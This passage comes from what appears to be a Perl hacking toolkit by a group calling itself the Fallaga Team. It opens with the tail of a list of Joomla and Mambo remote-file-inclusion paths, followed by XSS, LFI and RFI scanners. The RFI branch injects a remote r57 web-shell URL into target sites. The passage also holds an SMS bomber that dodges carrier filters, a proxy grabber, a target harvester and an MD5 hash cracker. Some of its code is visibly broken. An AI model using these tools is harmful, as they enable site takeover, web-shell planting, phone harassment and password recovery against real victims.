539. "/modules/mod_calendar.php?absolute_path=",
540. "/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=",
541. "/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=",
542. "/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=",
543. "/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=",
544. "/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=",
545. "/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=",
546. "/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=",
547. "/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=",
548. "/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=",
549. "/components/com_securityimages/configinsert.php?mosConfig_absolute_path=",
550. "/components/com_securityimages/lang.php?mosConfig_absolute_path=",
551. "/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=",
552. "/components/com_galleria/galleria.html.php?mosConfig_absolute_path=",
553. "/akocomments.php?mosConfig_absolute_path=",
554. "/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=",
555. "/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=",
556. "/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=",
557. "/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=",
558. "/components/com_zoom/includes/database.php?mosConfig_absolute_path=",
559. "/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=",
560. "/components/com_fm/fm.install.php?lm_absolute_path=",
561. "/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=",
562. "/components/com_lmo/lmo.php?mosConfig_absolute_path=",
563. "/administrator/components/com_webring/admin.webring.docs.php?component_dir=",
564. "/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=",
565. "/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=",
566. "/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=",
567. "/components/com_mambowiki/MamboLogin.php?IP=",
568. "/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=",
569. "/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=",
570. "/components/com_cpg/cpg.php?mosConfig_absolute_path=",
571. "/components/com_moodle/moodle.php?mosConfig_absolute_path=",
572. "/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=",
573. "/components/com_mospray/scripts/admin.php?basedir=",
574. "/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=",
575. "/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=",
576. "/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=",
577. "/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=",
578. "/components/com_madeira/img.php?url=",
579. "/components/com_bsq_sitestats/external/rssfeed.php?baseDir=",
580. "/com_bsq_sitestats/external/rssfeed.php?baseDir=",
581. "/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=",
582. "/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=",
583. "/administrator/components/admin.jjgallery.php?mosConfig_absolute_path=",
584. "/components/com_jreviews/scripts/xajax.inc.php?mosConfig_absolute_path=",
585. "/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=",
586. "/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=",
587. "/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=",
588. "/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=",
589. "/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=",
590. "/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=",
591. "/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=",
592. "/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=",
593. "/index.php?option=com_custompages&cpage=",
594. "/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=",
595. "/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=",
596. "/components/com_facileforms/facileforms.frame.php?ff_compath=",
597. "/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=",
598. "/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=",
599. "/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=",
600. "/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=",
601. "/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=",
602. "/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=",
603. "/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=",
604. "/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=",
605. "/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=",
606. "/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=",
607. "/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=",
608. "/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=",
609. "/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=",
610. "/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=",
611. "/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=",
612. "/administrator/components/com_dadamail/config.dadamail.php?GLOBALS['mosConfig_absolute_path']=",
613. "/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=",
614. "/administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=",
615. "/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=",
616. "/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=",
617. "/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=",
618. "/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=",
619. "/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=",
620. "/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=",
621. "/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=",
622. "/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=",
623. "/components/com_reporter/reporter.logic.php?mosConfig_absolute_path=",
624. "/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=",
625. "/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=",
626. "/components/com_joomlaboard/file_upload.php?sbp=",
627. "/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=",
628. "/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=",
629. "/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=",
630. "/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=",
631. "/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=",
632. "/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=",
633. "/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=",
634. "/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=",
635. "/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=",
636. "/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=",
637. "/modules/mod_as_category.php?mosConfig_absolute_path=",
638. "/components/com_articles.php?absolute_path=",
639. "/classes/html/com_articles.php?absolute_path=",
640. "/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=",
641. "/templates/be2004-2/index.php?mosConfig_absolute_path=",
642. "/libraries/pcl/pcltar.php?g_pcltar_lib_dir=",
643. "/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=",
644. "/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=",
645. "/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=",
646. "/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=",
647. "/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=",
648. "/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=",
649. "/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=",
650. "/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=",
651. "/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=",
652. "/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=",
653. "/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=",
654. "/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=",
655. "/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=",
656. "/components/com_mp3_allopass/allopass.php?mosConfig_live_site=",
657. "/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=",
658. "/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=",
659. "/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=",
660. "/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=",
661. "/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=",
662. "/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=",
663. "/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=",
664. "/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=",
665. "/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=",
666. "/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=",
667. "/administrator/components/com_color/admin.color.php?mosConfig_live_site=",
668. "/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=",
669. "/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=",
670. "/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=",
671. "/index.php?option=com_adsmanager&mosConfig_absolute_path=",
672. "/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=",
673. "/com_magazine_3_0_1/magazine.functions.php?config=",
674. "/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=",
675. "/administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=",
676. "/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=");
677.  
678.  
679. ##############################
680. #XSS
681.  
682. if ($ID==1){
683.  
684. print "\n XSS:";
685. print "\n\t\t Please Enter Target [http://www.site.com/search.php?id= ";
686. print "\n\t\t Target:";
687. $Target=<STDIN>;
688. chomp ($Target);
689.  
690. foreach $XSS(@XSS){
691. my $URL = $Target.$XSS;
692. my $Source = get $URL;
693. die "Can not get $URL" unless defined $URL;
694. if ( $URL =~ /Fallaga/ || /HAcked/ || /BHG/ || /XSS/ || /cookie/  ) { $Message ="XSS Vulnerability FOUND";}
695. else { $Message = "NOT FOUND XSS Vulnerability";}
696. print "$URL     =>    $Message\n";
697. print "\n \n \n \n \t \t \t \t FINISH ";
698. open (TEXT, '>>XSS.txt');
699. print TEXT "\n$URL   =>   $Message \n\n";
700. close (TEXT);
701. }
702. goto Exit;
703. }
704. ###############################
705. #LFI
706. if ($ID==2){
707.  
708. print "\n\t\t Please Enter Target [http://www.site.com/search.php?id= ";
709. print "\n\t\t Target:";
710. $Target=<STDIN>;
711. chomp ($Target);
712.  
713.  
714. foreach $LFI(@LFI){
715. my $URL = $Target.$LFI;
716. my $Source = get $URL;
717. die "Can not get $URL" unless defined $URL;
718. if ($Source =~ m/root/i || m/usr/i || m/dev/i || m/:x:/i || m/var/i || m/bin/i) { $Message ="LFI Vulnerability FOUND";}
719. else { $Message = "NOT FOUND LFI Vulnerability";}
720. print "$URL     =>    $Message\n";
721. print "\n \n \n \n \t \t \t \t FINISH ";
722. open (TEXT, '>>LFI.txt');
723. print TEXT "\n$URL   =>   $Message \n\n";
724. close (TEXT);
725. }
726.  
727. }
728. #################################
729. if ($ID==3){
730.  
731. print "\t\tPlease Enter Target [http://www.site.com]";
732. print "\n\n \t Target:";
733. $Target=<STDIN>;
734. chomp ($Target);
735. print "\n\t\t  please Enter Shell Link:";  #May Can help you : http://www.mcrracecars.co.uk/images/r57.txt
736. $Shell =<STDIN>;
737. chomp ($Shell);
738. print"\n\n \t\t Please wait";
739. sleep(2);
740. print"\n";
741.  
742. foreach $RFI(@RFI){
743. my $URL =$Target.$RFI.$Shell;
744. my $Source = get $URL;
745. die "Can not get $URL" unless defined $URL;
746. if ($Source =~ /r57shell/ || /safe_mode/ || /Executed / || /Shell/){ $Message ="RFI Vulnerability FOUND";}
747. else { $Message = "NOT FOUND RFI Vulnerability";}
748. print "\n \n \n \n \t \t \t \t FINISH ";
749. print "\n $URL  =>   $Message \n";
750. open (TEXT, '>>RFI.txt');
751. print TEXT "\n $URL   =>   $Message \n\n";
752. close (TEXT);
753.  
754. }
755.  
756. }
757. #################################
758. #XSS & LFI
759. if ($ID==4){
760.  
761. print "\t\tPlease Enter Target [http://www.site.com]";
762. print "\n\n \t Target:";
763. $Target=<STDIN>;
764. chomp ($Target);
765. print "\n\t\t  please Enter Shell Link:";  #May Can help you : http://www.mcrracecars.co.uk/images/r57.txt
766. $Shell =<STDIN>;
767. chomp ($Shell);
768. print"\n\n \t\t Please wait";
769. sleep(2);
770. print"\n";
771.  
772.  
773. foreach $XSS(@XSS){
774. my $URL = $Target.$XSS;
775. my $Source = get $URL;
776. die "Can not get $URL" unless defined $URL;
777. if ( $URL =~ /Fallaga/ || /HAcked/ || /BHG/ || /XSS/ || /cookie/  ) { $Message ="Vulnaravel a XSS";}
778. else { $Message = "NOT FOUND XSS Vulnerability";}
779. print "$URL     =>    $Message\n";
780. print "\n \n \n \n \t \t \t \t FINISH ";
781. open (TEXT, '>>ALL.txt');
782. print TEXT "\n$URL   =>   $Message \n\n";
783. close (TEXT);
784. }
785.  
786. foreach $LFI(@LFI){
787. my $URL = $Target.$LFI;
788. my $Source = get $URL;
789. die "Can not get $URL" unless defined $URL;
790. if ($Source =~ m/root/i || m/usr/i || m/dev/i || m/:x:/i || m/var/i || m/bin/i) { $Message ="LFI Vulnerability FOUND";}
791. else { $Message = "NOT FOUND LFI Vulnerability";}
792. print "$URL     =>    $Message\n";
793. print "\n \n \n \n \t \t \t \t FINISH ";
794. open (TEXT, '>>ALL.txt');
795. print TEXT "\n$URL   =>   $Message \n\n";
796. close (TEXT);
797. if ($ID==5) {exit;}
798. Exit:
799. exit;
800. system("pause");
801. }
802. }}
803. }
804. if($targett eq '6')
805. {
806. system('cls');
807. system('title Joomla Component Scanner');
808. package control;
809. use LWP::UserAgent;
810. use LWP::Simple;
811. use strict;
812. use warnings;
813. use threads;
814. use threads::shared;
815. use Config;
816. use HTML::TreeBuilder;
817. use HTML::Element;
818.  
819.  
820.  
821. $Config{useithreads} or die('Recompile Perl with threads to run this program.'); #thread(enabled) check
822.  
823.  
824. print"**********************************************************\n";
825. print"*************************SMS BoMbEr***********************\n";
826. print"************************By: Fallag crx**********************\n";
827. print"**********************************************************\n";
828.  
829. ##getting inputs, need to get rid of whitespace and or \n character with chomp();
830. print"Enter the number you want to bomb: \n";
831. chomp(my $phoneNum = <STDIN>);
832.  
833. print "Enter your carrier (AT&T=41|Verizon=203|Sprint=176): \n";
834. chomp(my $carrier = <STDIN>);
835.  
836. print "How many messages?: \n";
837. chomp(my $amountOfMessages = <STDIN>);
838.  
839. print "Enter your email: \n";
840. chomp(my $from = <STDIN>);
841.  
842. print "Enter your subject: \n";
843. chomp(my $subject = <STDIN>);
844.  
845. print "Enter your SMS MSG: \n";
846. chomp(my $message = <STDIN>);
847.  
848. print "**********************************************************\n";
849. print "**BOMBING\n";
850. my $numOfBombsSent :shared = 0;
851. my $inc :shared = 0;
852. $inc = 10000; #incrementing variable used for carriers that sort messages by email instead of phone #
853. &main;
854.  
855. sub main{
856.         while($numOfBombsSent<$amountOfMessages){
857.                 &checkAndBypassEmailFilter;
858.                 if(($amountOfMessages-$numOfBombsSent)==1){
859.                         &checkAndBypassEmailFilter;
860.                         &bomb;
861.                 } else {
862.                         my $pid = fork();   #fork splits process into two
863.                         if($pid){      #immediately have to handle both ($pid,0) <-child and ($pid) <- parent **parent
864.                                 if($numOfBombsSent<$amountOfMessages){
865.                                         &checkAndBypassEmailFilter;                             #has to make sure that child is done executing before it finishes. or else child will
866.                                         &bomb; #parent                                                  #become a zombie
867.                                 }
868.                                 waitpid($pid, 0);
869.                         } elsif($pid == 0){
870.                                 if($numOfBombsSent<$amountOfMessages){
871.                                         &checkAndBypassEmailFilter;
872.                                         &bomb; #child
873.                                 }
874.                         } else {
875.                                 die "Fork failed";
876.                         }
877.                 }
878.         }
879. }
880.  
881. sub checkAndBypassEmailFilter{
882.         if($carrier==203 or $carrier==176){ #this is for some carriers that organize based on the email function (thus not getting the full bomb effect)
883.                                                                                 #so this increments their email by one each time to start a new convo :D gotcha bitch
884.                 my @email = split('@', $from);
885.                 lock($inc);                                             #locks $inc variable so nothing else can modify it until it's done with it.
886.                 $from = $email[0].$inc++.'@'.$email[1];
887.         }
888. }
889. sub postUrl {
890.         my $content =
891.         my($url, $formref) = @_;
892.         my $ua = new LWP::UserAgent(timeout => 300); # set up a UserAgent object to handle request
893.         $ua->agent('perlproc/1.0');
894.         my $response = $ua->post($url, $formref);  #no need to handle the response from server.
895.         if($response->is_success){
896.                 return $response->content;
897.         } else {
898.                 return "POST failure";
899.         }
900. }
901. sub Return_Code { #From Saustin's SMS bomber
902.     my $content = $_[0];
903.     my $tree = HTML::TreeBuilder->new;
904.     $tree->parse($content);
905.     $tree->elementify();
906.  
907.     my @elements = $tree->find("INPUT"); #because they haven't heard of lowercase
908.     foreach(@elements)
909.     {
910.         my $ele = $_;
911.         if($ele->attr('NAME') eq "code")
912.         {
913.             return $ele->attr('value');
914.         }
915.     }
916. }
917.  
918. sub bomb{
919.         my $url = "http://www.onlinetextmessage.com/send.php";
920.         my $indexUrl = "http://www.onlinetextmessage.com/";
921.         my $lwp = get $indexUrl;
922.         my $code = Return_Code($lwp);
923.         #print "Code: $code\n";
924.         my %param = ('carrier' => $carrier, 'code' => $code, 'from' => $from, 'message' => $message, 'number' => $phoneNum,'quicktext' => '','remember' => 'y', 's' => 'Send Message','subject' => $subject);
925.         &postUrl($url,\%param);
926.         lock($numOfBombsSent);                  #locks $numOfBombsSent variable so nothing else can modify it until it's done with it.
927.         $numOfBombsSent++;
928.         print "Bomb Status: [",($numOfBombsSent),"/",($amountOfMessages),"]\n";
929. }}
930. if($targett eq '7')
931. {
932. system('cls');
933. system('title Proxy Grabber');
934. use strict;
935. use warnings;
936. use LWP::UserAgent;
937.  
938. my $useragent = LWP::UserAgent->new();
939. $useragent->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");
940.  
941. for (my $i=1;$i<50;$i++) {
942.  
943.         my $respone = $useragent->get("http://proxylist.hidemyass.com/search-226162/"."$i");
944.  
945.         my @list = split (/<td><span><style>/,$respone->content);
946.  
947.         foreach (@list) {
948.                 if ($_ =~ /<html>/) {
949.                         next;
950.                 }
951.                 my @flag=();
952.                 $_ =~ s/\n//g;
953.                 (my $gflag) = $_ =~ /^(.+)<\/style>/;
954.                 my @aflag = split (/\./, $gflag);
955.  
956.                 foreach my $fl (@aflag) {
957.                         if ((my $result) = $fl =~ /(.?.?.?.)\{display:inline\}/) {
958.                                 push (@flag, $result);
959.                         }
960.                 }
961.  
962.                 my @aspan = split (/span/, $_);
963.  
964.                 foreach my $sspan (@aspan) {
965.                         foreach my $fl (@flag) {
966.                                 if ((my $result) = $sspan =~ /class=\"$fl\">(\.[0-9]+\.|[0-9]+\.|\.[0-9]+|[0-9]+|\.)/) {
967.                                         print $result;
968.                                 }
969.                         }
970.                         if ((my $result) = $sspan =~ /class=\"[0-9]+\">(\.[0-9]+\.|[0-9]+\.|\.[0-9]+|[0-9]+|\.)/) {
971.                                 print $result;
972.                         }
973.                         if ((my $result) = $sspan =~ /style=\"display: inline\">(\.[0-9]+\.|[0-9]+\.|\.[0-9]+|[0-9]+|\.)/) {
974.                                 print $result;
975.                         }
976.                         if ((my @result) = $sspan =~ /(<\/div>|^>)(\.[0-9]+\.|[0-9]+\.|\.[0-9]+|[0-9]+|\.)/) {
977.                                 print $result[1];
978.                         }
979.                         if ((my $result) = $sspan =~ /style>(\.[0-9]+\.|[0-9]+\.|\.[0-9]+|[0-9]+|\.)/) {
980.                                 print $result;
981.                         }
982.                 }
983.                 (my $port) = $_ =~ /<td>([0-9]+?)<\/td>/;
984.                 print ":$port\n";
985.         }
986. }}
987. if($targett eq '9')
988. {
989. system('cls');
990. system('title Jce Server Scanner');
991. my $jces;
992. use LWP::UserAgent;
993. use HTTP::Request::Common qw(GET);
994. $ag = LWP::UserAgent->new();
995. $ag->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
996. $ag->timeout(10);
997. print "[+] Jce Server Scanner \n";
998. print "[+] Coded by fallag crx \n";
999. print "[+] Enter IP Jce ; Ex : 192.1.1.1 : \n";
1000. chomp ($jces = <STDIN>);
1001. chomp(my $jces = $ARGV[0]);
1002. for ($jces = 1; $jces <= 10000; $i+=10){
1003. $url = "http://www.bing.com/search?q=$jces$i&FORM=PERE";
1004. $resp = $ag->request(HTTP::Request->new(GET => $url));
1005. $rrs = $resp->content;
1006.  
1007. while($rrs =~ m/<a href=\"?http:\/\/(.*?)\//g){
1008. $link = $1;
1009. if ( $link !~ /overture|msn|live|bing|yahoo|duckduckgo|google|yahoo|microsof/){
1010. if ($link !~ /^http:/){$link = 'http://' . "$link" . '/';}
1011. if($link !~ /\"|\?|\=|index\.php/){
1012. print "\n\t $link";
1013. push(@resul,$link);}} }
1014.  
1015. while($rrs =~ m/<a href=\"?http:\/\/(.*?[\/].*?)\//g){
1016. $link = $1;
1017. if ( $link !~ /overture|msn|live|bing|yahoo|duckduckgo|google|yahoo|microsof/){
1018. if ($link !~ /^http:/){$link = 'http://' . "$link" . '/';}
1019. if($link !~ /\"|\?|\=|index\.php/){
1020. print "\n\t $link";
1021. push(@resul,$link);}} }
1022.  
1023. if ($rrs !~ m/class=\"sb_pagN\"/g){
1024. $total = $#resul+1;
1025. open(TXTS,"<KkK.txt"); chomp(@ar = <TXTS>); close(TXTS); push(@resul,@ar);
1026. open (TXT,">KkK.txt");
1027. foreach(@resul){$c{$_}++;next if $c{$_} > 1;print TXT "$_\n";push(@arq,$_);}
1028. close(TXT);
1029. $arq=$#arq+1;
1030. print "\n\n Total Result $total , total in file $arq\n"; exit;
1031. }}
1032. }
1033. if($targett eq '8')
1034. {
1035. system('title Wordpress Plugin Checker');
1036. use HTTP::Request;
1037. use LWP::UserAgent;
1038. use Term::ANSIColor;
1039. if($^O eq 'MSWin32'){ system('cls'); } else { system('clear'); }
1040. print color "bold yellow";
1041. print '
1042.        __        ______    ____  _             _          ____ _               _
1043.        \ \      / /  _ \  |  _ \| |_   _  __ _(R)_ __    / ___| |__   ___  ___| | _____ _ __
1044.         \ \ /\ / /| |M) | | |E) | | | | |/ _` | |  _ \  | |   |  _ \ /__ \/ __| |/ /__ \  __|
1045.          \ V  V / |  __/  |  __/| | |_| | (D| | | | | | | |___| | | |  __/ (I_|   |  K_/ |
1046.           \_/\_/  |_|     |_|   |_|\__,_|\__, |_|_| |_|  \____|_| |_|\___|\___|_|\_\___|_|
1047.                                          |___/
1048. ';
1049. print color "bold red";print "  Writed By : fallag crx
1050.  
1051.  FAllaga Team
1052.  
1053.                     Grey Hat Boys ...
1054. "; print color "reset";
1055. print "\n\n";
1056. print color "bold blue";print " [+]";print color"reset";print " input target Ex: http://www.Wordpress.com/ \n";
1057. print "\n";
1058. print "\n";
1059. print color "bold blue";print " [+]";print color"reset";print " input target please:    ";
1060. chomp($s=<STDIN>);
1061. print "\n\n";
1062. print "\n";
1063.  
1064.  
1065. open(plu_file,"<Plugin_path.txt") or die "Can Not open path file\n";
1066. my @mylist =<plu_file>;
1067. close("plu_file");
1068.  
1069. foreach $LST(@mylist){
1070.  
1071. $f=$s.$LST;
1072. my $rQ=HTTP::Request->new(GET=>$f);
1073. my $User_agent=LWP::UserAgent->new();
1074. $User_agent ->agent("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)");
1075. $User_agent->timeout(30);
1076. my $R=$User_agent->request($rQ);
1077. #--------------------
1078. if ($R->content =~ m/Index of/i ||
1079. $R->content =~ m/Directory/i ||
1080. $R->content =~ m/XML/i ||
1081. $R->content =~ m/Fatal error/i ||
1082. $R->content =~ m/Forbidden/i ||
1083. $R->content =~ m/Warning/i) {
1084. print color "bold green";print "\n [+]"; print color "reset"; print " Found ->  $f\n\n";
1085. open(ohh_Plugin,">>Plugins_finded.txt");
1086. print ohh_Plugin "\n$f\n";
1087. }
1088. if($answer =~ m/Error 404/i or $answer =~ m/nothing found/i){
1089. print "[NO] $f\n";
1090. }
1091. else {
1092. print "[NO] $f\n";
1093. }
1094. }}
1095. if($targett eq '10')
1096. {
1097. system('cls');
1098. system('title Md5 Cracker Online');
1099.                     {
1100. use LWP::UserAgent;
1101. use HTTP::Request::Common;
1102.  
1103. system('cls');
1104. system('title Online Md5 Cracker Edited By Fallag crx');
1105. print "\n\t***********************************\n";
1106. print "\t*      Md5 Cracker Online         *\n";
1107. print "\t*          ReC0ded by Fallag crx    *\n";
1108. print "\t*          Edited By Fallag crx     *\n";
1109. print "\t-      Menu  :                    -\n";
1110. print "\t*          1 - md5 hash           *\n";
1111. print "\t*          2 - md5.txt            *\n";
1112. print "\t***********************************\n";
1113.  
1114.  
1115. print "\nSubmit The Menu ~# ";
1116. $pick=<STDIN>;
1117. chop($pick);
1118.  
1119. if($pick == "1"){
1120. MD5FAIL:
1121. print "\nEnter The hash of MD5 ~# ";
1122. $hash=<STDIN>;
1123. chop($hash);
1124.  
1125.  
1126. if (length($hash)==32)
1127. {
1128. print "\n\t\n";
1129. print "\t*Md5 Cracker Online\n";
1130. print "\t*ReCoded By Fallag crx\n";
1131. print "\t*Fallaga Team \n";
1132. print  "\t\n\n";
1133. &next;
1134. } else {
1135. print "\nIt's not Md5! \n\nLook The Menu again!\n\n";
1136. goto MD5FAIL;
1137. }
1138. }
1139.  
1140.  
1141. if($pick == "2"){
1142.  
1143. print "\nPlease Submit The Hash Location ~# ";
1144. $file=<STDIN>;
1145. chop($file);
1146.  
1147. open(RES,"<","$file");
1148. @lol = <RES>;
1149. close(RES);
1150.  
1151. foreach $hash(@lol){
1152. print "       \nEnter The Md5 hahs Link:  $hash\n\n";
1153. &next;
1154. }
1155. $url = substr($url, $1 + 13);
1156. open (txt,">>md5.txt");
1157. print txt  $1,"\n";
1158. close(txt);
1159. }
1160. sub next {
1161.  
1162. $url = "http://www.md5decryption.com/";
1163. $lwp = LWP::UserAgent->new();
1164. $lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
1165. $request = $lwp->post($url, ["hash" => $hash, "submit" => "Decrypt It!"]);
1166.  
1167. print "1 www.md5decryption.com          ----  ";
1168. if ($request->content =~ /Decrypted Text: <\/b>(.*)<\/font><br\/><center>/)
1169. {
1170. print "Result : $1\n";
1171. } else {
1172. print "Result : Hash not found!\n";
1173. }
1174. $url = "http://tools.kerinci.net/?x=md5";
1175. $lwp = LWP::UserAgent->new();
1176. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
1177. $request = $lwp->post($url, ["hash" => $hash, "search" => "Search"]);
1178.  
1179. print "2 www.kerinci.net                ----  ";
1180. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
1181. print "Result : Hash not found!\n";
1182. } else {
1183. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
1184. print "Result : $1\n";
1185. }
1186. $url = "http://md5.rednoize.com/?q=$hash&s=md5&go.x=21&go.y=18&go=Search";
1187. $lwp = LWP::UserAgent->new();
1188. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
1189. $connect = $lwp -> get($url);
1190.  
1191. print "3 www.md5.rednoize.com           ----  ";
1192. if ($connect->content =~ /<div id="result" >(.*)<\/div>/)
1193. {
1194. print "Result : $1\n";
1195. } else {
1196. print "Result : Hash not found!\n";
1197. }
1198. $url = "http://www.md5online.org/md5-decrypt.html";
1199. $lwp = LWP::UserAgent->new();
1200. $lwp->agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
1201. $request = $lwp->post($url, ["hash" => $hash, "submit" => "Decrypt"]);
1202.  
1203. print "4 www.md5online.org              ----  ";
1204. if ($request -> content =~ /not\ found<\/a><\/td><\/tr>/){
1205. print "Result : Hash not found!\n";
1206. } else {
1207. $request -> content =~ /<tr><td>result:<\/td><td>(.+)<\/td><\/tr>/;
1208. print "Result : $1\n";
1209. }
